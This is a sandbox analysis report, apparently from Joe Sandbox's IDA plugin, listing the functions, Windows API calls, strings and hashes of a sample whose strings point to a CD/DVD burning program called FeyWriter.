Opcode Fuzzy Hash: 579d89073530974a9d48a9122a76f5c49448298836a5f4ff2e86e5536ecf49fc
Instruction Fuzzy Hash: EE9172B5640701BBE214DB65CD97FBBB3A9EF88B04F40891DB706576C0DAB4F9408B68

Function 00436490 Relevance: 61.6, APIs: 3, Strings: 32, Instructions: 392COMMON

Download Yara Rule

Strings

Vendor, xrefs: 0043669D
Identification, xrefs: 004366B1
Flags, xrefs: 004369CA
Read, xrefs: 0043685F, 00436934
DigitalAudioBL, xrefs: 004367CE
letter, xrefs: 0043663D
removable, xrefs: 0043662E
lun, xrefs: 00436689
LoadType, xrefs: 004367A4
CurrentSpeeds, xrefs: 004368C1
Revision, xrefs: 004366C5
Device%d, xrefs: 004365F4
DigitalAudio, xrefs: 00436726
target, xrefs: 00436677
BufferSize, xrefs: 0043678F
count, xrefs: 0043657A
Media, xrefs: 004366FC
Modes, xrefs: 004369FF
Devices, xrefs: 00436563
Capabilities, xrefs: 004366E9
Audio, xrefs: 00436750
RotationControl, xrefs: 004367B9
MaxSpeeds, xrefs: 004367DC
Write, xrefs: 00436806, 004368DB
dvd, xrefs: 00436838, 00436891, 0043690D, 00436966
General, xrefs: 00436711
NumVolLevels, xrefs: 0043677A
bus, xrefs: 00436665
Extended, xrefs: 004369A7
DigitalOutput, xrefs: 00436765
FeyWriter, xrefs: 00436536
type, xrefs: 0043661F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: FolderPath_memsetlstrcpy
String ID: Audio$BufferSize$Capabilities$CurrentSpeeds$Device%d$Devices$DigitalAudio$DigitalAudioBL$DigitalOutput$Extended$FeyWriter$Flags$General$Identification$LoadType$MaxSpeeds$Media$Modes$NumVolLevels$Read$Revision$RotationControl$Vendor$Write$bus$count$dvd$letter$lun$removable$target$type
API String ID: 206002174-3321134243
Opcode ID: aa79b691951796b97bb8838bc15c39feef627b194e175e1a76efaf61922cce1c
Instruction ID: 58ff257dba4f921c4900773781513cf9ff67d65bb6765db5c2cd03952296bf71
Opcode Fuzzy Hash: aa79b691951796b97bb8838bc15c39feef627b194e175e1a76efaf61922cce1c
Instruction Fuzzy Hash: 00E1A171158300AAC254EB21CC52FEBB3E8EF98708FD4991EF19952091EF78A609CB5D

Function 0044EC70 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 304windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32 ref: 0044EC95
CreateCompatibleDC.GDI32 ref: 0044ECAC
DeleteDC.GDI32(00000000), ref: 0044ECC1
CreateDIBSection.GDI32 ref: 0044ED6D
DeleteDC.GDI32(00000000), ref: 0044ED8E
SelectObject.GDI32(00000000,00000000), ref: 0044EDA8
SelectObject.GDI32(?,?), ref: 0044EDC3
CreateCompatibleDC.GDI32 ref: 0044EDD0
CreateCompatibleDC.GDI32 ref: 0044EDDF
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0044EDF3
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0044EE08
SelectObject.GDI32(00000000,?), ref: 0044EE1E
SelectObject.GDI32(?,00000000), ref: 0044EE34
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0044EE5B
SetBkColor.GDI32(00000000,00808080), ref: 0044EE67
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0044EE85
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0044EEA3
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0044EEBE
SelectObject.GDI32(00000000,?), ref: 0044EECA
SelectObject.GDI32(?,00000000), ref: 0044EED9
DeleteObject.GDI32(00000000), ref: 0044EEE7
DeleteObject.GDI32(?), ref: 0044EEF9
DeleteDC.GDI32(?), ref: 0044EF0B
DeleteDC.GDI32(00000000), ref: 0044EF16
FillRect.USER32(?,?,?), ref: 0044EF53
SelectObject.GDI32(?,?), ref: 0044EF64
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00B8074A), ref: 0044EF92
SelectObject.GDI32(00000000,?), ref: 0044EFA3
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00B8074A), ref: 0044EFC5
SelectObject.GDI32(00000000,?), ref: 0044EFD6
SelectObject.GDI32(?,?), ref: 0044EFE2
SelectObject.GDI32(?,00000000), ref: 0044EFEE
DeleteObject.GDI32(00000000), ref: 0044F008
DeleteDC.GDI32(?), ref: 0044F00F

Strings

(, xrefs: 0044ED02

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Object$Select$Delete$Create$Compatible$Bitmap$ColorFillRectSection
String ID: (
API String ID: 371559620-3887548279
Opcode ID: aafeb8529001a071af06e8b23278c5bc18cee8d4e601b4a90363768aae36aa7a
Instruction ID: 1ce5fd29ed2f741d82fa93d94d8e0f84c8d41c25acc3f97991b85ab05cbe14d1
Opcode Fuzzy Hash: aafeb8529001a071af06e8b23278c5bc18cee8d4e601b4a90363768aae36aa7a
Instruction Fuzzy Hash: 87B1F775648340AFE360DF65DD84F6BBBE9FBC8700F10491EF68893250DB74A8058B6A

Function 00424870 Relevance: 56.3, APIs: 30, Strings: 2, Instructions: 344windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004248CC
GetWindowTextLengthW.USER32(00000000), ref: 004248D3
GetParent.USER32(?), ref: 004248E0
GetWindowTextW.USER32(00000000,?,00000001), ref: 004248F4
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0042490D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0042491B
GetDlgItem.USER32(?,000003F8), ref: 0042498B
EnableWindow.USER32(00000000,00000000), ref: 00424994
GetParent.USER32(?), ref: 00424A28
SetWindowTextW.USER32(00000000,?), ref: 00424A34
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00424A4E
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424A66
SendMessageW.USER32(?,00000151,00000000,000000FF), ref: 00424A75
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00424A84
SendMessageW.USER32(?,00000143,00000000,?), ref: 00424B35
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00424B63
SendMessageW.USER32(?,00000151,?,?), ref: 00424BAF
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00424BF5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424C14
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424C33
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424C4B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424C6A
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424C89
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424CA8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00424CB7

Strings

, xrefs: 00424C8B
%gx, xrefs: 00424B17

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$ParentText$EnableItemLength
String ID: $%gx
API String ID: 1940389357-1649893397
Opcode ID: 9004a2ced05eae248dea7dcb813fc6e82e790c9d56ce19e7335133eadecc92c6
Instruction ID: 8d71916a64950539eef0fdc2e444f0fbb15363fc8930f13111d2ce05caf1c432
Opcode Fuzzy Hash: 9004a2ced05eae248dea7dcb813fc6e82e790c9d56ce19e7335133eadecc92c6
Instruction Fuzzy Hash: 13C1B471644340ABE320DBA5DD46F6BB3E8EFC4B04F004D1EF695962D0DAB9E504CB5A

Function 0041C8D0 Relevance: 56.3, APIs: 30, Strings: 2, Instructions: 344windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0041C92C
GetWindowTextLengthW.USER32(00000000), ref: 0041C933
GetParent.USER32(?), ref: 0041C940
GetWindowTextW.USER32(00000000,?,00000001), ref: 0041C954
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041C96D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0041C97B
GetDlgItem.USER32(?,000003F8), ref: 0041C9EB
EnableWindow.USER32(00000000,00000000), ref: 0041C9F4
GetParent.USER32(?), ref: 0041CA88
SetWindowTextW.USER32(00000000,?), ref: 0041CA94
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0041CAAE
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CAC6
SendMessageW.USER32(?,00000151,00000000,000000FF), ref: 0041CAD5
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041CAE4
SendMessageW.USER32(?,00000143,00000000,?), ref: 0041CB95
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0041CBC3
SendMessageW.USER32(?,00000151,?,?), ref: 0041CC0F
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0041CC55
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CC74
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CC93
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CCAB
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CCCA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CCE9
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CD08
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041CD17

Strings

, xrefs: 0041CCEB
%gx, xrefs: 0041CB77

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$ParentText$EnableItemLength
String ID: $%gx
API String ID: 1940389357-1649893397
Opcode ID: 3db3206eae4e5fff94d80a73fc6e6a2073cd7171500cba0a671a24527673a4cf
Instruction ID: 35ca13371e4b798297667d3897f8c7c2f815656fa83f68ccd85b79fef10dc6b1
Opcode Fuzzy Hash: 3db3206eae4e5fff94d80a73fc6e6a2073cd7171500cba0a671a24527673a4cf
Instruction Fuzzy Hash: 7BC1E571644340ABE320DBA4DD86F6BB3E8AF84B04F004D1DF695972D0DBB9E944CB5A

Function 00425140 Relevance: 55.8, APIs: 37, Instructions: 314windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000045F), ref: 00425169
GetDlgItem.USER32(?,00000461), ref: 00425177
GetDlgItem.USER32(?,00000417), ref: 00425185
GetDlgItem.USER32(?,00000419), ref: 00425193

Part of subcall function 00425C40: LoadImageW.USER32(?,000000F7,00000001,00000010,00000010,00000000), ref: 00425C5C
Part of subcall function 00425C40: GetDC.USER32(00000000), ref: 00425C71
Part of subcall function 00425C40: GetDeviceCaps.GDI32(00000000), ref: 00425C78
Part of subcall function 00425C40: ImageList_Create.COMCTL32(00000010,00000010,00000000,00000000,00000001,?,?,?,0042519F), ref: 00425C91
Part of subcall function 00425C40: ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,0042519F), ref: 00425CA1
Part of subcall function 00425C40: GetDlgItem.USER32 ref: 00425CD5
Part of subcall function 00425C40: SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 00425D01
Part of subcall function 00425C40: GetDlgItem.USER32(?,000004B9), ref: 00425D1F
Part of subcall function 00425C40: GetWindowRect.USER32(00000000,?), ref: 00425D27
Part of subcall function 00425C40: ScreenToClient.USER32(?,?), ref: 00425D3C
Part of subcall function 00425C40: ScreenToClient.USER32(?,?), ref: 00425D4B
Part of subcall function 00425C40: GetDlgItem.USER32(?,000004B9), ref: 00425D56

SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004251EF
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004251FE
SendMessageW.USER32(?,00000151,-00000001,00000000), ref: 0042520C
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0042522A
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0042524C
EnableWindow.USER32(?,00000000), ref: 00425254
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00425263
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004252AF
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004252BE
SendMessageW.USER32(?,00000151,-00000001,00000000), ref: 004252CC
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004252EA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0042530A
EnableWindow.USER32(?,00000000), ref: 00425312
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00425321
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00425339
EnableWindow.USER32(?,00000000), ref: 00425341
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00425350
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00425368
EnableWindow.USER32(?,00000000), ref: 00425370
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0042537F
GetParent.USER32(?), ref: 00425385
GetDlgItem.USER32(00000000,00000001), ref: 00425390
EnableWindow.USER32(00000000), ref: 00425397
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004253A8

Part of subcall function 00424E10: SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00424E2C
Part of subcall function 00424E10: SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00424E3A
Part of subcall function 00424E10: SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00424E4D
Part of subcall function 00424E10: SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00424E5B
Part of subcall function 00424E10: GetParent.USER32(?), ref: 00424E63
Part of subcall function 00424E10: SendMessageW.USER32(00000000,00008000,00000000,00000000), ref: 00424E72
Part of subcall function 00424E10: KillTimer.USER32(?,0000002A,?,00000000,00000000), ref: 00424EB9
Part of subcall function 00424E10: SetTimer.USER32(?,0000002A,000003E8,00000000), ref: 00424ECC
Part of subcall function 00424E10: GetDlgItem.USER32(?,0000041C), ref: 00424EE8
Part of subcall function 00424E10: EnableWindow.USER32(00000000,?), ref: 00424EF9
Part of subcall function 00424E10: IsDlgButtonChecked.USER32(?,00000469), ref: 00424F08
Part of subcall function 00424E10: GetDlgItem.USER32(?,00000469), ref: 00424F3B

CheckDlgButton.USER32(?,00000469), ref: 004253DA
CheckDlgButton.USER32(?,00000489,00000000), ref: 004253ED
GetParent.USER32(?), ref: 004253F3
SendMessageW.USER32(00000000,00008002,?,00000000), ref: 00425409
CheckDlgButton.USER32(?,000003F7), ref: 0042541C
CheckDlgButton.USER32(?,000003F8), ref: 0042542F
CheckDlgButton.USER32(?,0000041C,00000000), ref: 00425442
CheckDlgButton.USER32(?,0000041D), ref: 00425455
CheckDlgButton.USER32(?,0000041E), ref: 00425468

Part of subcall function 00424020: IsDlgButtonChecked.USER32(?,00000489), ref: 0042404E
Part of subcall function 00424020: GetParent.USER32(?), ref: 00424060
Part of subcall function 00424020: SendMessageW.USER32(00000000,00008002,00000001,00000000), ref: 00424076
Part of subcall function 00424020: SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004240DD
Part of subcall function 00424020: SendMessageW.USER32(?,00000149,00000000,00000000), ref: 004240FC
Part of subcall function 00424020: SendMessageW.USER32(?,00000148,00000000,?), ref: 00424114
Part of subcall function 00424020: lstrcmpW.KERNEL32(?,?), ref: 00424120
Part of subcall function 00424020: SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00424134

Part of subcall function 00423F60: SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00423F79
Part of subcall function 00423F60: SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00423F87
Part of subcall function 00423F60: SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00423F98
Part of subcall function 00423F60: SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00423FA6
Part of subcall function 00423F60: GetParent.USER32(?), ref: 00423FAE
Part of subcall function 00423F60: SendMessageW.USER32(00000000,00008000,00000001,00000000), ref: 00423FBD
Part of subcall function 00423F60: GetDlgItem.USER32(?,00000469), ref: 00423FC8
Part of subcall function 00423F60: EnableWindow.USER32(00000000,00000000), ref: 00423FD7
Part of subcall function 00423F60: CheckDlgButton.USER32(?,00000469,00000000), ref: 00423FEC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Item$Button$CheckWindow$Enable$Parent$Image$CheckedClientList_ScreenTimer$CapsCreateDeviceIconKillLoadRectReplacelstrcmp
String ID:
API String ID: 2281056732-0
Opcode ID: af0d0d09d8e55d4380561aa7d1035ef90d13981bfc65795e0626761fcc85a092
Instruction ID: df60b095d0c8b2d745d9303b3104fbb95f4b60e997c3a51013d37f215a294f03
Opcode Fuzzy Hash: af0d0d09d8e55d4380561aa7d1035ef90d13981bfc65795e0626761fcc85a092
Instruction Fuzzy Hash: 86A147B17407047BE224AB669C92F77B3ADAF84B04F50481DB7469B2D1D9B8F9008B6D

Function 00442010 Relevance: 55.8, APIs: 20, Strings: 17, Instructions: 279stringCOMMON

Download Yara Rule

APIs

lstrcmpW.KERNEL32(?,-datadvdproject), ref: 00442024
lstrcmpW.KERNEL32(?,-audioproject), ref: 00442037
lstrcmpW.KERNEL32(?,-mixedproject), ref: 00442060
lstrcmpW.KERNEL32(?,-dvdvideoproject), ref: 00442089

Part of subcall function 00441DF0: EnterCriticalSection.KERNEL32(-00000010), ref: 00441E4D
Part of subcall function 00441DF0: GetCurrentThreadId.KERNEL32 ref: 00441E53
Part of subcall function 00441DF0: LeaveCriticalSection.KERNEL32(-00000010), ref: 00441E73

Strings

-burnproject , xrefs: 0044218F
-datadvdproject, xrefs: 0044201E
.raw, xrefs: 0044226A
-copyimage, xrefs: 004420CE
-erase, xrefs: 00442109
-audioproject, xrefs: 00442031
.cue, xrefs: 00442252
-mixedproject, xrefs: 0044205A
-tracks, xrefs: 004420EC
.img, xrefs: 00442246
-burnimage , xrefs: 00442165
-burnimage, xrefs: 004420B0
-copydisc, xrefs: 00442145
-fixate, xrefs: 00442127
-dvdvideoproject, xrefs: 00442083
.bin, xrefs: 0044225E
.iso, xrefs: 0044223A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcmp$CriticalSection$CurrentEnterLeaveThread
String ID: -audioproject$-burnimage$-burnimage $-burnproject $-copydisc$-copyimage$-datadvdproject$-dvdvideoproject$-erase$-fixate$-mixedproject$-tracks$.bin$.cue$.img$.iso$.raw
API String ID: 1664527957-3941113631
Opcode ID: 0d41dda627e535ac8e7e0c6b15fe5d5a926943ee8f6d815cc004499d8c5d66d9
Instruction ID: 2c64a968f60fbb6ddce7d115ebb5fa5081f5de4e83e4bd82dca9a1d23770da93
Opcode Fuzzy Hash: 0d41dda627e535ac8e7e0c6b15fe5d5a926943ee8f6d815cc004499d8c5d66d9
Instruction Fuzzy Hash: 0D6109A238161636EA20726A6C12FFB634D9FD1796F00417BFB00D11D1EBCF884652BD

Function 00450D90 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 378COMMON

Download Yara Rule

APIs

DrawEdge.USER32(?,?,00000006,00000002), ref: 00450DE8
OffsetRect.USER32(?,00000000,?), ref: 00450E68
GetSysColor.USER32(0000000F), ref: 00450EED
SetTextColor.GDI32(?,00000000), ref: 00450EF1
GetSysColor.USER32(00000014), ref: 00450EFD
SetBkColor.GDI32(?,00000000), ref: 00450F01
SetBrushOrgEx.GDI32(?,?,?,00000000), ref: 00450F24
FillRect.USER32(?,?,75BFCF90), ref: 00450F31

Strings

,, xrefs: 00451067

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Color$Rect$BrushDrawEdgeFillOffsetText
String ID: ,
API String ID: 3353358337-3772416878
Opcode ID: ece5b4d54a280882d2312377d10bca214682e7c50ca6adc9dfb69974d1c67854
Instruction ID: 7ad18c06c2e8e87ad890f5c5e372e21b79eeea2e1a86d3841863d47a803db183
Opcode Fuzzy Hash: ece5b4d54a280882d2312377d10bca214682e7c50ca6adc9dfb69974d1c67854
Instruction Fuzzy Hash: F4E117B56083419FD324CF69C984B6BB7F9BBC8705F008A2DFA8587251D774E848CB56

Function 004488F0 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 307windowstringCOMMON

Download Yara Rule

APIs

SHGetFileInfoW.SHELL32(C:\,00000000,?,000002B4,00004001), ref: 00448928
_memset.LIBCMT ref: 00448966
SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00448988
SendMessageW.USER32(00000000,00001121,00000064,00000000), ref: 00448995
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0044899E
SHGetDesktopFolder.SHELL32(?), ref: 004489B1
SHGetMalloc.SHELL32(?), ref: 004489C0
SendMessageW.USER32 ref: 00448A57
SendMessageW.USER32(?,00001102,00000002,00000000), ref: 00448A66
lstrcmpW.KERNEL32(?,004EE93C,?,?,?,00001102,00000002,00000000,?,?,?,?,?,?,0000000A,00001132), ref: 00448A91
SendMessageW.USER32(00000000,0000110B,00000009,00000000), ref: 00448AA6
SHGetMalloc.SHELL32(?), ref: 00448AB2

Part of subcall function 00447300: SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 00447315
Part of subcall function 00447300: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00447331
Part of subcall function 00447300: SendMessageW.USER32(?,00001102,00000002,00000000), ref: 00447343
Part of subcall function 00447300: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00447354
Part of subcall function 00447300: SendMessageW.USER32 ref: 004473A3
Part of subcall function 00447300: SendMessageW.USER32(?,0000110A,00000006,00000000), ref: 004473D8

lstrlenW.KERNEL32(004EE93C,?), ref: 00448B21
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00448B83
lstrlenW.KERNEL32(?), ref: 00448BC3
__wcsnicmp.LIBCMT ref: 00448BD9
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00448BF4
SendMessageW.USER32(?,00001102,00000002,00000000), ref: 00448C05
SendMessageW.USER32(?,0000110A,00000006,00000000), ref: 00448C1B
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00448B00

Part of subcall function 00445890: SendMessageW.USER32 ref: 004458D7

Part of subcall function 00476FF0: lstrlenW.KERNEL32(?,?,0041F8B9,005394B4), ref: 00476FF6

MessageBoxW.USER32(?,An error occured when trying to register the directory monitor. As a result the FeyWriter explorer tree will not automatically syn,Error,00000010), ref: 00448CAC

Strings

g, xrefs: 00448A35
An error occured when trying to register the directory monitor. As a result the FeyWriter explorer tree will not automatically syn, xrefs: 00448CA6
